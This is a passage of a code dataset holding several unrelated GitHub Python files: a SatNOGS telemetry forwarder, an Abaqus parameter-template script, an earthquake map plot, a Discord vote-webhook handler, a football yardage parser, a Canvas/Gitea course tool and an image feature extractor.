\"certs\"\n","repo_name":"usnistgov/WIPP-Registry-docker","sub_path":"deploy/cdcs/ci_settings.py","file_name":"ci_settings.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30452399858","text":"import requests\nfrom datetime import datetime\nimport time\nimport sys\nimport socket\n\nargs = list(sys.argv)[1:]\n\nsource = args[0]\nnoradID = int(args[1])\nlat = float(args[2])\nlong = float(args[3])\n\nprint(\"Posting data: \\n Source: \"+source+\"\\n NORAD ID: \"+str(noradID)+\"\\n Latitude: \"+str(lat)+\"\\n Longitude: \"+str(long)+\"\\n\")\n\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nexcept:\n print(\"FAILED TO CREATE SOCKET\")\n\ntry:\n print(\"CONNECTING TO \"+str(\"127.0.0.1\")+\":\"+str(\"8100\"))\n s.connect(('127.0.0.1', 8100))\n print(\"CONNECTED!\")\nexcept Exception as e:\n print(\"CANNOT CONNECT TO SOUNDMODEM. ABORTING...\",e)\n #abort\n exit()\n\ndef send_sids(bcn):\n DB_TELEMETRY_ENDPOINT_URL= \"https://db.satnogs.org/api/telemetry/\"\n # SiDS parameters\n params = {\n 'noradID': noradID,\n 'source': str(source), \n 'timestamp': datetime.utcfromtimestamp(time.time()).strftime('%Y-%m-%dT%H:%M:%S.000Z'), \n 'locator': 'longLat', \n 'longitude': long, \n 'latitude': lat, \n 'frame': str(bcn), \n }\n #print(DB_TELEMETRY_ENDPOINT_URL, params)\n postSuccess = False\n while(not postSuccess):\n try:\n response = requests.post(DB_TELEMETRY_ENDPOINT_URL, data=params, timeout=10)\n print(response)\n response.raise_for_status()\n postSuccess = True\n print(\"Posted frame to Satnogs!\")\n except Exception as e:\n \n print('Could not post data to satnogs, retrying.', e)\n time.sleep(0.5)\n return\n\n\nwhile True:\n reply = str(s.recv(4096).hex())\n reply = reply[4:len(reply)-2].replace(\"\\n\",\"\").replace(\" \",\"\") #just in case\n if reply != \"\":\n #print(reply)\n send_sids(reply)\n","repo_name":"radio-satellites/satnogs-forwarder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6479351104","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport csv\nimport math\nimport argparse\nimport importlib\nimport pickle\nimport numpy\n\ndef getVelocityString(velTable):\n accelTime = velTable[-1]/10\n amp = -1\n vString = '((0, {0}), '.format(amp)\n for i in range(len(velTable)-1):\n vString += '({0}, {1}), ({2}, {3}), '.format(velTable[i]-accelTime, amp, velTable[i]+accelTime, amp*-1)\n amp = amp*-1\n vString += '({0}, {1}))'.format(velTable[-1], amp)\n return vString\n \ndef getBoundaryDisplacements(parameterizationRun):\n displacements = []\n for k in range(len(modelData.confiningStress)):\n with open(os.path.join('HOMOGENIZE', 'binaryData', '{0}({1}.{2})_homogenizedData.pkl'.format(modelData.modelName, parameterizationRun, k)), 'rb') as bundleFile:\n bundle = pickle.load(bundleFile)\n timeHistory = bundle[0]\n stressHistory = bundle[1]\n strainHistory = bundle[2]\n LE11 = [x[0,0] for x in strainHistory]\n LE22 = [x[1,1] for x in strainHistory]\n \n U1 = [x*modelData.modelSize for x in LE11]\n U2 = [x*modelData.modelSize for x in LE22]\n\n v1Tuple = [(timeHistory[i], U1[i]) for i in range(len(timeHistory))]\n v2Tuple = [(timeHistory[i], U2[i]) for i in range(len(timeHistory))]\n displacements.append((v1Tuple, v2Tuple))\n return displacements\n \ndef getBoundaryStresses(parameterizationRun):\n stresses = []\n for k in range(len(modelData.confiningStress)):\n with open(os.path.join('HOMOGENIZE', 'binaryData', '{0}({1}.{2})_homogenizedData.pkl'.format(modelData.modelName, parameterizationRun, k)), 'rb') as bundleFile:\n bundle = pickle.load(bundleFile)\n timeHistory = bundle[0]\n stressHistory = bundle[1]\n strainHistory = bundle[2]\n S11 = [-x[0,0] for x in stressHistory]\n S22 = [-x[1,1] for x in stressHistory]\n \n S1Tuple = [(timeHistory[i], S11[i]) for i in range(len(timeHistory))]\n S2Tuple = [(timeHistory[i], S22[i]) for i in range(len(timeHistory))]\n stresses.append((S1Tuple, S2Tuple))\n return stresses\n\ndef getModelParameters(parameterizationRun):\n\n parameters = {'$$mSize': modelData.modelSize,\n '$$mName': '\\''+modelData.modelName+'\\'',\n '$$sName': ['{0}({1}.{2})'.format(modelData.modelName, 0, x) for x in range(len(modelData.confiningStress))],\n '$$nSteps': modelData.numberOfSteps,\n '$$rho': modelData.rho,\n '$$confStress': [x for x in modelData.confiningStress], #***********************************************************fix for different confining stresses!!!!!\n '$$approxStrain': modelData.velocity[parameterizationRun]*modelData.simulationTime[parameterizationRun]/modelData.modelSize,\n '$$vel':modelData.velocity[parameterizationRun],\n '$$sTime':modelData.simulationTime[parameterizationRun],\n '$$vString':getVelocityString(modelData.velocityTable[parameterizationRun]),\n '$$boundaryDisplacements': getBoundaryDisplacements(parameterizationRun),\n '$$boundaryStresses': getBoundaryStresses(parameterizationRun),\n '$$relVars': modelData.relevantMeasurements, \n '$$abaqusMaterial':'\\''+modelData.abaqusMaterial+'\\''}\n return parameters\n \ndef getOstrichParameters(parameterizationRun):\n ostrichParametersText = '' \n ostrichParameters = material.ostrichParameters.keys()\n for parameter in ostrichParameters:\n p = material.ostrichParameters[parameter]\n newRecord = '$' + parameter + '\\t' + str(p['init']) + '\\t' + str(p['low']) + '\\t' +str(p['high']) +'\\tnone\\tnone\\tnone\\n'\n ostrichParametersText += newRecord\n \n parameters = {'$$ostrichParameters':ostrichParametersText, \n '$$ostrichObservations':observations}\n\n\n\n return parameters\n \ndef getModelConstants(fittedName):\n parameters = {}\n for parameter in material.ostrichParameters:\n parameters['${0}'.format(parameter)] = parameter\n for i in range(len(modelData.velocityTable)):\n with open(os.path.join('OSTRICH', 'ostOutput', 'OstOutput_{0}_{1}_{2}.txt'.format(fittedName, modelData.abaqusMaterial,i+1))) as ostOutputFile:\n ostOutput = ostOutputFile.read()\n startIndex = ostOutput.find('Optimal Parameter Set')\n endIndex = ostOutput.find('\\n\\n', startIndex)\n parameterBlock = ostOutput[startIndex:endIndex+1]\n for parameter in material.ostrichParameters:\n paramPosition = parameterBlock.find(parameter)\n colonPosition = parameterBlock.find(':', paramPosition)\n eolPosition = parameterBlock.find('\\n', paramPosition)\n value = float(parameterBlock[colonPosition+1:eolPosition])\n parameters['${0}'.format(parameter)] = value\n return parameters\n \n \ndef getMaterialConstants():\n parameters = {'$$$materialDef':material.abaqusTemplate}\n return parameters\n \ndef fillTemplate(template, parameters, file):\n with open(os.path.join('OSTRICH', template), 'r') as templateFile:\n t = templateFile.read()\n for i in parameters.keys():\n t = t.replace(i, str(parameters[i]))\n with open(os.path.join('OSTRICH', file), 'w') as modelFile:\n modelFile.write(t)\n \n\ndef importModelData(modelName):\n global modelData\n modelData = importlib.import_module('UDEC.modelData.'+modelName)\n\ndef importMaterialData(materialName):\n global material\n material = importlib.import_module('OSTRICH.materials.'+materialName)\n\ndef run(modelName, parameterizationRun, fittedName):\n importModelData(modelName)\n importMaterialData(modelData.abaqusMaterial)\n main(parameterizationRun, fittedName)\n\ndef main(parameterizationRun, fittedName):\n fillTemplate('parameters.tpl', getModelParameters(parameterizationRun-1), 'parameters.py')\n fillTemplate('runAbaqus.tpl', getMaterialConstants(), 'runAbaqus.temp.tpl') \n fillTemplate('runAbaqus.temp.tpl', getModelConstants(fittedName), 'runAbaqus.py') \n for j in range(len(modelData.confiningStress)):\n open(os.path.join('OSTRICH', 'fittedHistory', '{0}({1}.{2})_{3}_fittedHistory.pkl'.format(modelData.modelName, parameterizationRun-1, j, modelData.abaqusMaterial)), 'w').close()\n \n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='runAbaqusModel: Creates the Neccessary Input files to Run Abaqus model')\n parser.add_argument('-f', '--fitted-model', required=True, help='Name of the model that has been fitted to DEM data')\n parser.add_argument('-n', '--new-model', required=True, help='Name of the model to run with -f parameters')\n parser.add_argument('-r', '--run', required=True, type=int, help='Parameterization run number')\n\n args = parser.parse_args()\n fittedName = args.fitted_model\n modelName = args.new_model\n parameterizationRun = args.run\n \n importModelData(modelName)\n importMaterialData(modelData.abaqusMaterial)\n main(parameterizationRun, fittedName)\n \n \n","repo_name":"yetisir/up-frac","sub_path":"runAbaqusModel.py","file_name":"runAbaqusModel.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7847452824","text":"# Site https://earthquake.usgs.gov/earthquakes/feed/v1.0/geojson.php\n# Data from https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/all_hour.geojson\nimport json\n\nfrom plotly.graph_objs import Scattergeo, Layout\nfrom plotly import offline\n\nfile_name = './last_earthquakes.json'\n\nwith open(file_name) as f:\n data = json.load(f)\n features = data.get('features')\n\n mags, lons, lats = [], [], []\n\n for feature in features:\n mag = feature.get('properties').get('mag')\n mags.append(mag)\n\n geometry = feature.get('geometry').get('coordinates')\n lon = geometry[0]\n lat = geometry[1]\n\n lons.append(lon)\n lats.append(lat)\n\n # data = [Scattergeo(lon=lons, lat=lats)]\n\n data = [{\n 'type': 'scattergeo',\n 'lon': lons,\n 'lat': lats,\n 'marker': {\n 'color': mags,\n 'colorscale': 'Viridis',\n 'reversescale': True,\n 'colorbar': {'title': 'Mag'},\n 'size': [5*mag for mag in mags]\n },\n }]\n\n map_layout = Layout(title='Last earthquakes')\n\n fig = {'data': data, 'layout': map_layout}\n\n offline.plot(fig, filename='global_earthquakes.html')\n","repo_name":"MarcinGladkowski/python","sub_path":"python_crash_course/data_presentation/earthquakes.py","file_name":"earthquakes.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70513176554","text":"from contextlib import suppress\nfrom re import compile, escape\n\nfrom discord import (\n ButtonStyle,\n HTTPException,\n NotFound,\n PartialEmoji,\n User,\n Webhook,\n ui,\n)\nfrom topgg.types import BotVoteData\n\nfrom Classes import ShakeBot, _\n\n############\n#\n\n\nclass Link(ui.View):\n def __init__(self, link):\n super().__init__(timeout=None)\n self.add_item(\n ui.Button(\n style=ButtonStyle.blurple,\n emoji=PartialEmoji(name=\"arrow\", id=1093146865706479756),\n label=\"You can vote for Shake every 12h!\",\n url=link,\n )\n )\n\n\nclass Event:\n def __init__(self, bot: ShakeBot, data: dict):\n self.bot: ShakeBot = bot\n self.data: BotVoteData = data\n\n async def __await__(self):\n \"\"\"This functions is called whenever someone votes for the bot on Top.gg\"\"\"\n\n user: User = await self.bot.get_user_global(user_id=int(self.data.user))\n\n rep = dict(\n (escape(k), \"\") for k in [\"discord\", \"Discord\", \"everyone\", \"Everyone\"]\n )\n\n user_name = compile(\"|\".join(rep.keys())).sub(\n lambda m: rep[escape(m.group(0))], str(user)\n )\n webhooks = list(\n filter(\n lambda item: item is not None,\n [\n Webhook.from_url(webhook.link, client=self.bot)\n for webhook in self.bot.config.bot.webhooks\n if webhook.type == \"votes\"\n ],\n )\n )\n for webhook in webhooks:\n try:\n await webhook.edit(\n name=user_name, avatar=await user.avatar.read(), reason=\"Logs\"\n )\n except (HTTPException, NotFound, ValueError, AttributeError):\n continue\n else:\n with suppress(HTTPException, NotFound):\n await webhook.send(\n content=\"{emoji} `{name}` has voted for me!.\".format(\n emoji=PartialEmoji(\n animated=True, name=\"blobjoin\", id=1058033663675207820\n ),\n name=user_name,\n ),\n view=Link(self.bot.config.botlists.topgg_vote),\n )\n\n\n#\n############\n","repo_name":"Shake-The-Bot/Source","sub_path":"Extensions/Functions/Gateway/dblgg/dblgg.py","file_name":"dblgg.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"16876540141","text":"import re\n\n############################################################################################################\n## Play Text Yardage Play\n############################################################################################################\nclass playyards:\n def __init__(self, text=None, playtype=None, test=False):\n self.text = text\n self.playtype = playtype\n self.test = test\n \n self.playyards = None\n self.kickingyards = None\n self.runbackyards = None\n self.penaltyyards = None\n \n self.yards = None\n \n assert self.findKickoffYards(\"Joseph Bulovas kickoff for 63 yds , Hassan Hall return for 61 yds to the Alab 37\") == 63, \"Should be 63\"\n assert self.findKickReturnYards(\"Joseph Bulovas kickoff for 63 yds , Hassan Hall return for 61 yds to the Alab 37\") == 61, \"Should be 61\"\n assert self.findKickoffYards(\"Evan O'Hara kickoff for 65 yds for a touchback\") == 65, \"Should be 65\"\n assert self.findKickReturnYards(\"Evan O'Hara kickoff for 65 yds for a touchback\") == 25, \"Should be 25\"\n assert self.findPuntYards(\"Skyler DeLong punt for 32 yds, downed at the Lvile 15\") == 32, \"Should be 32\"\n assert self.findKickReturnYards(\"Skyler DeLong punt for 32 yds, downed at the Lvile 15\") == 0, \"Should be 0\"\n assert self.findPenaltyYards(\"ALABAMA Penalty, Delay of Game (-5 Yards) to the Lvile 9\") == -5, \"Should be -5\"\n \n assert self.findPenaltyYards(\"LOUISVILLE Penalty, Substitution Infraction (-5 Yards) to the Lvile 16\") == -5, \"Should be -5\"\n assert self.findPenaltyYards(\"LOUISVILLE Penalty, False Start (Colin Wilson) to the Alab 44\") == -5, \"Should be -5\"\n assert self.findPenaltyYards(\"LOUISVILLE Penalty, Offensive Holding (Cole Bentley) to the Lvile 42\") == -10, \"Should be -10\"\n assert self.findPenaltyYards(\"ALABAMA Penalty, Defensive Offside (Quinnen Williams) to the Lvile 39\") == 5, \"Should be 5\"\n assert self.findPenaltyYards(\"ALABAMA Penalty, Delay of Game (-5 Yards) to the Lvile 9\") == -5, \"Should be -5\"\n \n \n \n def setPlay(self, text):\n self.text = text\n \n def setPlayType(self, playtype):\n self.playtype = playtype\n \n def makeYards(self, yards, debug=False):\n if self.test:\n return yards\n \n if yards == \"NET\" or yards == \"IGN\":\n return yards\n \n if yards == None:\n return None\n \n try:\n result = int(yards)\n except:\n raise ValueError(\"Could not extract yards from [{0}] play with [{1}] text\".format(yards, self.text))\n \n return result\n \n \n def show(self, yards, caller, debug=False): \n if debug:\n print(\"\\t\\t===> {0} Yards -> [{1}]\".format(caller, yards))\n \n \n ############################################################################################################\n ## Find Play Yardage\n ############################################################################################################\n def findYards(self, debug=False):\n sign = 1\n result = None\n \n self.findKickingYards(debug)\n self.findReturnYards(debug)\n self.findPlayYards(debug)\n \n yards = [self.playyards, self.kickingyards, self.runbackyards, self.penaltyyards]\n if not len([x for x in yards if x is not None]):\n if self.test is True:\n if debug:\n print(\"Could not find yards in this play\")\n self.yards = None\n else:\n self.yards = None\n else:\n if any([isinstance(x, int) for x in yards]):\n self.yards = sum([x for x in yards if (x is not None) and (isinstance(x, int))])\n elif any([isinstance(x, str) for x in yards]):\n self.yards = \", \".join([x for x in yards if (x is not None) and (isinstance(x, str))])\n else:\n self.yards = None\n \n\n\n \n ############################################################################################################\n ## Find Play Yardage\n ############################################################################################################\n def findPlayYards(self, debug=False):\n sign = 1\n result = None\n start = self.text\n \n prep = (\"(or|for)\")\n num = \"([+-?]\\d+|\\d+)\" \n dist = (\"(yards|yard|Yds|yds|Yd|yd)\")\n \n \n #################################################################\n ### Check for yards\n #################################################################\n if result is None:\n if sum([x in self.text for x in [\"no gain\", \"no loss\", \"DECLINED\"]]) > 0:\n result = [0]\n if debug:\n print(\"\\t\\t===> {0}\".format(result)) \n\n if result is None:\n if sum([x in self.text for x in [\"loss of zero\", \"gain of zero\"]]) > 0:\n result = [0]\n if debug:\n print(\"\\t\\t===> {0}\".format(result)) \n\n if result is None:\n m = re.search(r\"{0}\\s{1}\\s{2}\".format(prep, num, dist), self.text)\n if m is not None:\n result = m.groups(0)\n result = result[1:]\n if debug:\n print(\"\\t\\t===> {0}\".format(result)) \n \n if result is None:\n m = re.search(r\"\\w+\\s(-\\d+)\\s\\w+\", self.text)\n if m is not None:\n result = m.groups(0) \n if debug:\n print(\"\\t\\t===> {0}\".format(result))\n\n if result is None:\n m = re.search(r\"for\\sa\\s(\\w+)\\sof\\s(\\d+)\\s{0}\".format(dist), self.text)\n if m is not None:\n results = m.groups()\n sign = results[0]\n result = results[1:]\n if sign == \"loss\":\n sign = -1\n result = [int(result[0])*sign]\n if debug:\n print(\"\\t\\t===> {0} ({1})\".format(result, sign))\n \n if result is None:\n pattern = r\"{0}\\s{1}\\spenalty\".format(num, dist)\n m = re.search(pattern, self.text)\n if m is not None:\n sign = -1\n result = m.groups()\n if debug:\n print(\"\\t\\t===> {0}\".format(result))\n \n if result is None:\n if sum([x in self.text for x in [\"incomplete\", \"Incomplete\"]]) > 0:\n result = [0]\n if debug:\n print(\"\\t\\t===> {0}\".format(result))\n \n if result is None:\n if sum([x in self.text for x in [\" no gain\", \" No Gain\", \"failed\"]]) > 0:\n result = [0]\n if debug:\n print(\"\\t\\t===> {0}\".format(result))\n \n if result is None:\n m = re.search(r\"{0}\\s{1}\".format(num, dist), self.text)\n if m is not None:\n result = m.groups()\n if debug:\n print(\"\\t\\t===> {0}\".format(result))\n\n if result is None:\n result = [None]\n self.playyards = self.makeYards(result[0])\n self.show(self.runbackyards, \"Drive\", debug=debug)\n\n \n \n\n \n \n ############################################################################################################\n ## Find Punt Yardage\n ############################################################################################################\n def findPuntYards(self, text):\n kick = (\"(punt|Punt|PUNT)\")\n prep = (\"(for|For|FOR|or|Or|OR)\")\n num = \"([+-?]\\d+|\\d+)\" \n dist = (\"(yard|Yard|YARD|yd|Yd|YD)\")\n \n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(kick, prep, num, dist), text)\n if m is not None:\n result = m.groups(0)\n yards = int(result[2])\n return yards\n return None\n \n \n ############################################################################################################\n ## Find Kickoff Yardage\n ############################################################################################################\n def findKickoffYards(self, text):\n kick = (\"(kickoff|Kickoff|KICKOFF)\")\n prep = (\"(for|For|FOR)\")\n num = \"([+-?]\\d+|\\d+)\" \n dist = (\"(yard|Yard|YARD|yd|Yd|YD)\")\n \n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(kick, prep, num, dist), text)\n if m is not None:\n result = m.groups(0)\n yards = int(result[2])\n return yards\n return None\n \n \n ############################################################################################################\n ## Find Kick Return Yardage\n ############################################################################################################\n def findKickReturnYards(self, text):\n kick = \"(return|Return|RETURN|returns|Returns|RETURNS)\"\n prep = \"(for|For|FOR)\"\n num = \"([+-?]\\d+|\\d+)\" \n dist = \"(yard|Yard|YARD|yd|Yd|YD)\"\n\n if \"fair catch\" in text:\n return 0\n \n if \"downed at the\" in text:\n return 0\n \n if \"no gain\" in text:\n return 0\n \n if \"touchback\" in text:\n return 25\n \n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(kick, prep, num, dist), text)\n if m is not None:\n result = m.groups(0)\n yards = int(result[2])\n return yards\n \n if \"return\" not in text:\n return 0\n \n return None\n\n\n ############################################################################################################\n ## Find Penalty Yardage\n ############################################################################################################\n def findPenaltyYards(self, text):\n num = \"([+-?]\\d+|\\d+)\" \n dist = \"(yard|Yard|YARD|yd|Yd|YD)\"\n \n pos = text.find(\"(\")\n if pos > 0:\n partext = text[pos:text.find(\")\")]\n m = re.search(r\"{0}\\s{1}\".format(num, dist), partext)\n if m is not None:\n result = m.groups(0)\n yards = int(result[0])\n return yards\n\n if \"declined\" in text:\n return 0\n \n if \"False Start\" in text:\n return -5\n \n if \"Offensive Holding\" in text:\n return -10\n \n if \"Defensive Holding\" in text:\n return 10\n \n if \"Delay of Game\" in text:\n return -5\n \n if \"Defensive Offside\" in text:\n return 5\n \n if \"Ineligible Downfield\" in text:\n return -5\n \n if \"Defensive Pass Interference\" in text:\n return 15\n \n if \"Out of Bounds\" in text:\n return 35\n \n return None\n \n\n\n \n ############################################################################################################\n ## Find Kicking Yardage\n ############################################################################################################\n def findKickingYards(self, text):\n return\n yards = None\n \n if yards is None:\n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(kick, prep, num, dist), self.text)\n if m is not None:\n result = m.groups(0)\n yards = result[2]\n\n self.kickingyards = self.makeYards(yards)\n self.show(self.kickingyards, \"Kicking\", debug=debug)\n\n\n \n \n\n ############################################################################################################\n ## Find Return Yardage\n ############################################################################################################\n def findReturnYards(self, debug=False):\n runback = \"(return|runback|returns)\"\n norun = \"(downed|down)\"\n prep = \"(or|for|at)\"\n article = \"(the|a)\"\n num = \"([+-?]\\d+|\\d+)\"\n word = \"(\\w+)\"\n dist = \"(yards|yard|Yds|yds|Yd|yd)\"\n \n yards = None\n \n if yards is None:\n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(runback, prep, num, dist), self.text)\n if m is not None:\n result = m.groups(0)\n yards = result[2]\n \n if yards is None:\n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\\s{4}\".format(norun, prep, article, word, num), self.text)\n if m is not None:\n result = m.groups(0)\n yards = 0\n \n if yards is None:\n if sum([x in self.text for x in [\"fair catch\", \"Fair Catch\"]]) > 0:\n yards = 0\n\n self.runbackyards = self.makeYards(yards)\n self.show(self.runbackyards, \"Return\", debug=debug)","repo_name":"tgadf/football","sub_path":"playYards.py","file_name":"playYards.py","file_ext":"py","file_size_in_byte":13292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19855470167","text":"import functools\nimport re\nfrom datetime import datetime\nfrom typing import Any, Callable, Dict, List, Optional, TypeVar\n\nfrom joint_teapot.config import settings\nfrom joint_teapot.utils.logger import logger\nfrom joint_teapot.utils.main import first, default_repo_name_convertor\nfrom joint_teapot.workers import Canvas, Git, Gitea, Mattermost\nfrom joint_teapot.workers.joj import JOJ\n\n_T = TypeVar(\"_T\")\n\n\ndef for_all_methods(\n decorator: Callable[[Callable[[_T], _T]], Any]\n) -> Callable[[_T], _T]:\n @functools.wraps(decorator)\n def decorate(cls: Any) -> Any:\n for attr in cls.__dict__: # there's probably a better way to do this\n if callable(getattr(cls, attr)):\n setattr(cls, attr, decorator(getattr(cls, attr)))\n return cls\n\n return decorate\n\n\ndef log_exception_in_loguru(func: Callable[..., Any]) -> Callable[..., Any]:\n @functools.wraps(func)\n def decorator(*args: Any, **kwargs: Any) -> Any:\n try:\n return func(*args, **kwargs)\n except Exception as e:\n logger.exception(e)\n\n return decorator\n\n\n@for_all_methods(log_exception_in_loguru)\nclass Teapot:\n _canvas = None\n _gitea = None\n _git = None\n _joj = None\n _mattermost = None\n\n @property\n def canvas(self) -> Canvas:\n if not self._canvas:\n self._canvas = Canvas()\n return self._canvas\n\n @property\n def gitea(self) -> Gitea:\n if not self._gitea:\n self._gitea = Gitea()\n return self._gitea\n\n @property\n def git(self) -> Git:\n if not self._git:\n self._git = Git()\n return self._git\n\n @property\n def joj(self) -> JOJ:\n if not self._joj:\n self._joj = JOJ()\n return self._joj\n\n @property\n def mattermost(self) -> Mattermost:\n if not self._mattermost:\n self._mattermost = Mattermost()\n return self._mattermost\n\n def __init__(self) -> None:\n logger.info(\n \"Settings loaded. \"\n f\"Canvas Course ID: {settings.canvas_course_id}, \"\n f\"Gitea Organization name: {settings.gitea_org_name}, \"\n f\"Mattermost Team name: {settings.mattermost_team}@{settings.mattermost_domain_name}{settings.mattermost_suffix}\"\n )\n logger.debug(\"Teapot initialized.\")\n\n def add_all_canvas_students_to_teams(self, team_names: List[str]) -> None:\n return self.gitea.add_canvas_students_to_teams(self.canvas.students, team_names)\n\n def create_personal_repos_for_all_canvas_students(self, suffix: str = \"\") -> List[str]:\n return self.gitea.create_personal_repos_for_canvas_students(\n self.canvas.students,\n lambda user: default_repo_name_convertor(user) + suffix\n )\n\n def create_teams_and_repos_by_canvas_groups(\n self, group_prefix: str = \"\"\n ) -> List[str]:\n def convertor(name: str) -> Optional[str]:\n if group_prefix and not name.startswith(group_prefix):\n return None\n team_name, number_str = name.split(\" \")\n number = int(number_str)\n return f\"{team_name}-{number:02}\"\n\n return self.gitea.create_teams_and_repos_by_canvas_groups(\n self.canvas.students, self.canvas.groups, convertor, convertor\n )\n\n def get_public_key_of_all_canvas_students(self) -> Dict[str, List[str]]:\n return self.gitea.get_public_key_of_canvas_students(self.canvas.students)\n\n def clone_all_repos(self) -> None:\n for i, repo_name in enumerate(self.gitea.get_all_repo_names()):\n logger.info(f\"{i}, {self.gitea.org_name}/{repo_name} cloning...\")\n self.git.repo_clean_and_checkout(repo_name, \"master\")\n\n def create_issue_for_repos(\n self,\n repo_names: List[str],\n title: str,\n body: str,\n from_file: bool = False,\n use_regex: bool = False,\n ) -> None:\n if from_file:\n try:\n f = open(body)\n content = f.read()\n f.close()\n except FileNotFoundError:\n logger.error(f\"file {body} not found\")\n return\n except Exception as e:\n logger.exception(\"Error occurred when opening file {body}:\")\n logger.error(e)\n return\n else:\n content = body\n\n affected_repos = []\n if use_regex:\n all_repos = self.gitea.get_all_repo_names()\n for pattern in repo_names:\n affected_repos.extend([\n repo\n for repo in all_repos\n if re.search(pattern, repo) is not None\n ])\n else:\n affected_repos = repo_names\n\n for repo_name in affected_repos:\n self.gitea.create_issue(repo_name, title, content)\n\n\n def create_milestone_for_repos(\n self, repo_names: List[str], title: str, description: str, due_on: datetime\n ) -> None:\n for repo_name in repo_names:\n self.gitea.create_milestone(repo_name, title, description, due_on)\n\n def check_exist_issue_by_title(\n self, repo_names: List[str], title: str\n ) -> List[str]:\n res = []\n for repo_name in repo_names:\n if not self.gitea.check_exist_issue_by_title(repo_name, title):\n res.append(repo_name)\n return res\n\n def checkout_to_repo_by_release_name(\n self, repo_name: str, release_name: str, due: datetime = datetime(3000, 1, 1)\n ) -> bool:\n repo_releases = self.gitea.get_repo_releases(repo_name)\n release = first(repo_releases, lambda item: item.name == release_name)\n if release is None or release.created_at.replace(tzinfo=None) >= due:\n logger.warning(\n f\"{self.gitea.org_name}/{repo_name} checkout to \"\n f\"release by name {release_name} fail\"\n )\n return False\n self.git.repo_clean_and_checkout(repo_name, f\"tags/{release.tag_name}\")\n logger.info(\n f\"{self.gitea.org_name}/{repo_name} checkout to \"\n f\"tags/{release.tag_name} succeed\"\n )\n return True\n\n def get_repos_status(self, commit_lt: int, issue_lt: int) -> None:\n for repo_name, (\n commit_count,\n issue_count,\n ) in self.gitea.get_repos_status().items():\n if commit_count < commit_lt or issue_count < issue_lt:\n logger.info(\n f\"{self.gitea.org_name}/{repo_name} has \"\n f\"{commit_count} commit(s), {issue_count} issue(s)\"\n )\n\n\nif __name__ == \"__main__\":\n teapot = Teapot()\n","repo_name":"BoYanZh/Joint-Teapot","sub_path":"joint_teapot/teapot.py","file_name":"teapot.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"6582066155","text":"import sys\n\n# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3\ndef progress_bar(count, total, status=''):\n bar_len = 60\n filled_len = int(round(bar_len * count / float(total)))\n\n percentage_complete = round(100.0 * count / float(total), ndigits=1)\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n sys.stdout.write('[%s] %s%s ...%s\\r' % (bar, percentage_complete, '%', status))\n sys.stdout.flush()","repo_name":"loarie/crowdsourcing","sub_path":"util/progress_bar.py","file_name":"progress_bar.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33265642030","text":"import numpy as np\nimport cv2\nfrom skimage.feature import hog\n\n# Define a function to return HOG features and visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True):\n\n # Call with two outputs if vis==True\n if vis == True:\n features, hog_image = hog(img, orientations=orient, \n pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), \n transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features, hog_image\n\n # Otherwise call with one output\n else: \n features = hog(img, orientations=orient, \n pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), \n transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features\n\n# Define a function to compute binned color features \ndef bin_spatial(img, size=(32, 32)):\n # Use cv2.resize().ravel() to create the feature vector\n return cv2.resize(img, size).ravel() \n\n# Define a function to compute color histogram features \n# NEED TO CHANGE bins_range if reading .png files with mpimg!\ndef color_hist(img, nbins=32, bins_range=(0, 256)):\n # Compute the histogram of the color channels separately\n channel1_hist = np.histogram(img[:,:,0], bins=nbins, range=bins_range)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n\n # Concatenate the histograms into a single feature vector\n return np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n\ndef BGR2_(img, color_space):\n color_options = {\n 'BGR': 0,\n 'RGB': cv2.COLOR_BGR2RGB,\n 'HSV': cv2.COLOR_BGR2HSV,\n 'LUV': cv2.COLOR_BGR2LUV,\n 'HLS': cv2.COLOR_BGR2HLS,\n 'YUV': cv2.COLOR_BGR2YUV,\n 'YCrCb': cv2.COLOR_BGR2YCrCb\n }\n\n conversion = color_options.get(color_space)\n if conversion == None:\n raise Exception('Did not recognize color space')\n elif conversion is 0:\n return np.copy(img) \n else:\n return cv2.cvtColor(img, conversion) \n\n# Define a function to extract features from a single image window\ndef single_img_features(feature_params, img): \n\n #1) Define an empty list to receive features\n img_features = []\n\n #2) Apply color conversion\n feature_image = BGR2_(img, feature_params.color_space)\n\n #3) Compute spatial features if 